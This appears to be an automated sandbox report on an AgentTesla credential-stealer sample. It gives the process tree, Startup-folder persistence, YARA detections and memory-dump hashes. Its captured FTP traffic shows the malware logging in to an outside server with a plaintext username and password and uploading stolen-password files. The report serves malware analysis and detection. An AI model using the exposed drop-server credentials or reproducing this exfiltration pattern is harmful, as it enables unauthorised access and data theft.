                                                          Nov 5, 2024 16:14:47.557940960 CET21497045.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                          Nov 5, 2024 16:14:47.558146954 CET4970421192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                                          Nov 5, 2024 16:14:47.851866961 CET21497045.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                                          Nov 5, 2024 16:14:47.852010965 CET4970421192.168.2.55.2.84.236PASS Fineboy777@
                                                          Nov 5, 2024 16:14:48.224853992 CET21497045.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                                          Nov 5, 2024 16:14:48.520653963 CET21497045.2.84.236192.168.2.5504 Unknown command
                                                          Nov 5, 2024 16:14:48.520804882 CET4970421192.168.2.55.2.84.236PWD
                                                          Nov 5, 2024 16:14:48.815012932 CET21497045.2.84.236192.168.2.5257 "/" is your current location
                                                          Nov 5, 2024 16:14:48.816781998 CET4970421192.168.2.55.2.84.236TYPE I
                                                          Nov 5, 2024 16:14:49.110512018 CET21497045.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                          Nov 5, 2024 16:14:49.110735893 CET4970421192.168.2.55.2.84.236PASV
                                                          Nov 5, 2024 16:14:49.405493021 CET21497045.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,229,20)
                                                          Nov 5, 2024 16:14:49.414191961 CET4970421192.168.2.55.2.84.236STOR PW_user-760639_2024_11_05_10_14_45.html
                                                          Nov 5, 2024 16:14:50.253566027 CET21497045.2.84.236192.168.2.5150 Accepted data connection
                                                          Nov 5, 2024 16:14:50.547862053 CET21497045.2.84.236192.168.2.5226-File successfully transferred
                                                          226-File successfully transferred226 0.300 seconds (measured here), 1.04 Kbytes per second
                                                          Nov 5, 2024 16:15:00.649292946 CET21497065.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 18:14. Server port: 21.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 18:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                          Nov 5, 2024 16:15:00.649571896 CET4970621192.168.2.55.2.84.236USER fgghv@alternatifplastik.com
                                                          Nov 5, 2024 16:15:00.964030981 CET21497065.2.84.236192.168.2.5331 User fgghv@alternatifplastik.com OK. Password required
                                                          Nov 5, 2024 16:15:00.964308023 CET4970621192.168.2.55.2.84.236PASS Fineboy777@
                                                          Nov 5, 2024 16:15:01.274818897 CET21497065.2.84.236192.168.2.5230 OK. Current restricted directory is /
                                                          Nov 5, 2024 16:15:01.566062927 CET21497065.2.84.236192.168.2.5504 Unknown command
                                                          Nov 5, 2024 16:15:01.566447973 CET4970621192.168.2.55.2.84.236PWD
                                                          Nov 5, 2024 16:15:01.856513977 CET21497065.2.84.236192.168.2.5257 "/" is your current location
                                                          Nov 5, 2024 16:15:01.860585928 CET4970621192.168.2.55.2.84.236TYPE I
                                                          Nov 5, 2024 16:15:02.163722992 CET21497065.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                          Nov 5, 2024 16:15:02.165029049 CET4970621192.168.2.55.2.84.236PASV
                                                          Nov 5, 2024 16:15:02.456311941 CET21497065.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,234,9)
                                                          Nov 5, 2024 16:15:02.464004993 CET4970621192.168.2.55.2.84.236STOR PW_user-760639_2024_11_05_10_14_58.html
                                                          Nov 5, 2024 16:15:03.286788940 CET21497065.2.84.236192.168.2.5150 Accepted data connection
                                                          Nov 5, 2024 16:15:03.579176903 CET21497065.2.84.236192.168.2.5226-File successfully transferred
                                                          226-File successfully transferred226 0.292 seconds (measured here), 1.07 Kbytes per second

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:10:14:42
                                                          Start date:05/11/2024
                                                          Path:C:\Users\user\Desktop\O65887cvz7.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\O65887cvz7.exe"
                                                          Imagebase:0x670000
                                                          File size:1'211'392 bytes
                                                          MD5 hash:7059C9FAE0E7595BF454796551C79DAB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2054427117.0000000005680000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:10:14:43
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                          Imagebase:0xe00000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2179804969.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:10:14:55
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
                                                          Imagebase:0x7ff6c2f00000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:10:14:56
                                                          Start date:05/11/2024
                                                          Path:C:\Users\user\AppData\Roaming\InnerException.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\InnerException.exe"
                                                          Imagebase:0x790000
                                                          File size:1'211'392 bytes
                                                          MD5 hash:7059C9FAE0E7595BF454796551C79DAB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:10:14:56
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                          Imagebase:0x250000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3286051641.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3286051641.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be8b0d9a50bde5dc5522ca371a2d8b7ec3d9e9cd094cf7b3d1e7ce53e4a76179
                                                            • Instruction ID: 6e5d79ae51937f9b102ca6dee466b29deb077368ba92957789f902e1be64897f
                                                            • Opcode Fuzzy Hash: be8b0d9a50bde5dc5522ca371a2d8b7ec3d9e9cd094cf7b3d1e7ce53e4a76179
                                                            • Instruction Fuzzy Hash: BD418538A45208CFEB94DF69C954BADBBF2FB48300F1084A9D50AA3394DB349E80CF04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-1569530325
                                                            • Opcode ID: eff11229342c98f296d772a4d805e286a53ec3523f67965111f8800e7e615087
                                                            • Instruction ID: a7e9ebfc104dc917ffb594189b6f62e6e912a4de08f8275d08a9e8186f7bfa51
                                                            • Opcode Fuzzy Hash: eff11229342c98f296d772a4d805e286a53ec3523f67965111f8800e7e615087
                                                            • Instruction Fuzzy Hash: DAB0922680F780CE8F024A5649D41607F70BEA2140319C1E6C4890F447C0648587E321
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$TJjq$TJjq$Teeq
                                                            • API String ID: 0-3147250315
                                                            • Opcode ID: 7c6dc4d137df9671e9afeeb2f41819d3f957e2eec60f16cce8b6b0eb5faa62ca
                                                            • Instruction ID: 4bce9967b2ae1e6661c7f200a18d89c520f028755926ba075bf9dd5c175a50c2
                                                            • Opcode Fuzzy Hash: 7c6dc4d137df9671e9afeeb2f41819d3f957e2eec60f16cce8b6b0eb5faa62ca
                                                            • Instruction Fuzzy Hash: D8D17A74B04106CFDB44CF6AC494BAEBBF2EF89310F1584A9E44AAB3A1DA35DC41CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d%kq$d%kq$$eq$$eq
                                                            • API String ID: 0-1514485977
                                                            • Opcode ID: 7857d44dee897ef2f16e50a731bf4c36440cd4aa9e542ad6f67a984698f81cbb
                                                            • Instruction ID: 8444a9716a30f934e3dc34aa3f4793cc0b8b8d8b6b05aeac68756e9a3b3db134
                                                            • Opcode Fuzzy Hash: 7857d44dee897ef2f16e50a731bf4c36440cd4aa9e542ad6f67a984698f81cbb
                                                            • Instruction Fuzzy Hash: AF61E0347042048FCF15AB7A886176A7BF6BF86310F2089EAE606DB3D6DE31DD418391
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: hfq$$eq
                                                            • API String ID: 0-954121706
                                                            • Opcode ID: 9f93533de9b21fe61823074cb3f6cb53502fa7ea27cba6d3555ffccca49bac10
                                                            • Instruction ID: 8332b6de564b0cd2a93fe8807cda3ab5ac652c217a05b195e5c2ec495378499b
                                                            • Opcode Fuzzy Hash: 9f93533de9b21fe61823074cb3f6cb53502fa7ea27cba6d3555ffccca49bac10
                                                            • Instruction Fuzzy Hash: DE314972E042458FCB12DF79D4415EABBF2EF85320B65429AD108BB261EB315D06CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $A
                                                            • API String ID: 0-2621533443
                                                            • Opcode ID: 0a17f7a458f25381338029cd22adc251952ba7978bd0c52328e52aa891c164e6
                                                            • Instruction ID: 61a7d347191fff746c359aac008f4e0f7086f41e3a5c001c4ec16d0bd783053a
                                                            • Opcode Fuzzy Hash: 0a17f7a458f25381338029cd22adc251952ba7978bd0c52328e52aa891c164e6
                                                            • Instruction Fuzzy Hash: 0F316078A112288FDB68DF28CA959E9BBF1AF49304F2080D5AA1DA7755D730DE818F50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B$l
                                                            • API String ID: 0-968051817
                                                            • Opcode ID: b8c185cf6025b5bf581788fcfde5489d497a9ae6d088235115e21ce6fbe3ae3e
                                                            • Instruction ID: 5059efa9a669e57e48f59abb73e7973f693a95db12f83ab75ab6d977b96b244a
                                                            • Opcode Fuzzy Hash: b8c185cf6025b5bf581788fcfde5489d497a9ae6d088235115e21ce6fbe3ae3e
                                                            • Instruction Fuzzy Hash: 17219E74941229CEDF60EF55C8887EDBBF0BB09314F1455AAC409B2694DB780AC4DF14
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $=
                                                            • API String ID: 0-3320991764
                                                            • Opcode ID: 41a736bfed8dc935f64dfae7a19411b4f8ab9264d0d7674af3717645f3646ad2
                                                            • Instruction ID: cb46ba28c3be8148dbe0f5fbdebcf184415cc730ba5b5f5a34038832d0af6b35
                                                            • Opcode Fuzzy Hash: 41a736bfed8dc935f64dfae7a19411b4f8ab9264d0d7674af3717645f3646ad2
                                                            • Instruction Fuzzy Hash: D0112A70944129CFDBB49F54C848BADBBB2FB05309F1040EA951E67680DB745EC8DF25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teeq
                                                            • API String ID: 0-348098666
                                                            • Opcode ID: 66c6bcc4248987591b89d029c2abe653045f4e0d0faf436c4f68e6e9717718eb
                                                            • Instruction ID: 250e4150b444bb1b8cb2dd2096abc202c81dbc820b653868ffc60475955a4591
                                                            • Opcode Fuzzy Hash: 66c6bcc4248987591b89d029c2abe653045f4e0d0faf436c4f68e6e9717718eb
                                                            • Instruction Fuzzy Hash: AA216B70B002089FDB549F79D458AAEBBF2EF88710F204469E402EB3A1CF758D45CB80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teeq
                                                            • API String ID: 0-348098666
                                                            • Opcode ID: 7a15353f81c55e43ab8cfdfb194296b6b8f142703edf49cf219bfaa25c00f455
                                                            • Instruction ID: 98a6929882b70b051bb79bdc8eeb7fa02bf28203415c17a6cae823a1354cc1c8
                                                            • Opcode Fuzzy Hash: 7a15353f81c55e43ab8cfdfb194296b6b8f142703edf49cf219bfaa25c00f455
                                                            • Instruction Fuzzy Hash: E1213D70B002089FDB549F79C558AAEBBF2AF88710F204469E406EB3A5CE759D45CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: 2c2ebf9406192640ebe67ea3f0dcc2ba3aded637b0593448f515d17a6e2a6131
                                                            • Instruction ID: 6200fc8ca58c900f172bb80b75ed139017252cb5da50fd9413f43b933779e467
                                                            • Opcode Fuzzy Hash: 2c2ebf9406192640ebe67ea3f0dcc2ba3aded637b0593448f515d17a6e2a6131
                                                            • Instruction Fuzzy Hash: 0F212570D04A08EFDB04EFAAC1487AEBBFAFF49315F1084AAD006A7255DB744A84CF04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: a874a1ac517c54d07a466c04506bf10cc79063b15ae403815a458ff4fb535443
                                                            • Instruction ID: 5e8b5bda16006abc625052c6f6be1305cf0dd9d269528931c11dcdf37771455a
                                                            • Opcode Fuzzy Hash: a874a1ac517c54d07a466c04506bf10cc79063b15ae403815a458ff4fb535443
                                                            • Instruction Fuzzy Hash: 8A213774D04608EFDB04EFAAC5487AEBBFAFF49315F1084AAD006A7255DB744A84CF04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: hfq
                                                            • API String ID: 0-1674822302
                                                            • Opcode ID: 3f57935d90ec618150724b55c6b84936288ba5c9011f74cb9ab095f098988ad3
                                                            • Instruction ID: 3844b1e27114b8f581ef9543aa28d690dacf96c4f588ecaf336336894ec9b83d
                                                            • Opcode Fuzzy Hash: 3f57935d90ec618150724b55c6b84936288ba5c9011f74cb9ab095f098988ad3
                                                            • Instruction Fuzzy Hash: FF110472E0024F9BDF11DBA8C4515EEBBF6DF85311F104626D50677250EF716A06CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: f944ba6310a8887656051803a80ef3fd5dae41e21387bc5e691225bde6e373a0
                                                            • Instruction ID: cb4dfc8945c962c50dce4acd35bd09877eb6ede7e42d4ee87a9ad2c7dfa6412b
                                                            • Opcode Fuzzy Hash: f944ba6310a8887656051803a80ef3fd5dae41e21387bc5e691225bde6e373a0
                                                            • Instruction Fuzzy Hash: A921F374D58229CFCBA5DF24D8586E9BBF2FB48305F1042EAE40AA7284DB345E81DF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: 5b609c3b30068601a1c9c2ec37ae717b540cc646c0751d45ce62bd08833d8bc1
                                                            • Instruction ID: 0b0edfe3ff8f74921271f55eb462772a77750ab0723e044c8e1ddfaf8171863b
                                                            • Opcode Fuzzy Hash: 5b609c3b30068601a1c9c2ec37ae717b540cc646c0751d45ce62bd08833d8bc1
                                                            • Instruction Fuzzy Hash: 701162B4E01209DFCB90DFA8D549AAEBBF1FB48304F20856AD819E7351D7349A41CF91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: 4de9b5fa887ce56145e6aee16234914eaeeb8d0c501aad13d32a92140f4ba528
                                                            • Instruction ID: be989570a1716ed7a5c4022080ffcb65b8ef0c737ba2582dad180d5da546b6b6
                                                            • Opcode Fuzzy Hash: 4de9b5fa887ce56145e6aee16234914eaeeb8d0c501aad13d32a92140f4ba528
                                                            • Instruction Fuzzy Hash: 2221D574E101298FCBA4EF28C894A9DBBF1FB49308F2040E9D819A7785D7305E818F54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: 8875858627d435a07e331cbf9203357f87a48a4ee72dde26e9d8034459c5c4a4
                                                            • Instruction ID: f4cc9f6e9d86323de040b59b7c021cc6bca70f65559a0f95be09ec1bc0a52d4a
                                                            • Opcode Fuzzy Hash: 8875858627d435a07e331cbf9203357f87a48a4ee72dde26e9d8034459c5c4a4
                                                            • Instruction Fuzzy Hash: BD11E874E102188FDB64DF68C9456DDBBB2FB4A304F2040DAA81DA7785DB70AE81CF60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: b15344708657d2d41f2b5433c85b60d437c2054596f06ad7f7de353665ef643a
                                                            • Instruction ID: 434e3feb647bc2cd730f55bec7cd1951c4667f199c17b0ac5238d26d0fa3f6e7
                                                            • Opcode Fuzzy Hash: b15344708657d2d41f2b5433c85b60d437c2054596f06ad7f7de353665ef643a
                                                            • Instruction Fuzzy Hash: C011F774A04219CFDBA4DF18C944B99B7B5FB4A308F1040D9A41AA7B41DB349EC0CF56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3162483948
                                                            • Opcode ID: 254032a4dd88df7c23a7a3200a147933fc9bf539f35a00b3c4f8d64f20049ec5
                                                            • Instruction ID: 3e093fd6cf6b6247544024910cf926b7e77266743fdaac521427422b8c868434
                                                            • Opcode Fuzzy Hash: 254032a4dd88df7c23a7a3200a147933fc9bf539f35a00b3c4f8d64f20049ec5
                                                            • Instruction Fuzzy Hash: EEF0D478E492298FDB60DF54D8447E9B7B5FB48314F1081E6E91DA7281C7345E848F90
                                                            Strings
                                                            Memory Dump Source
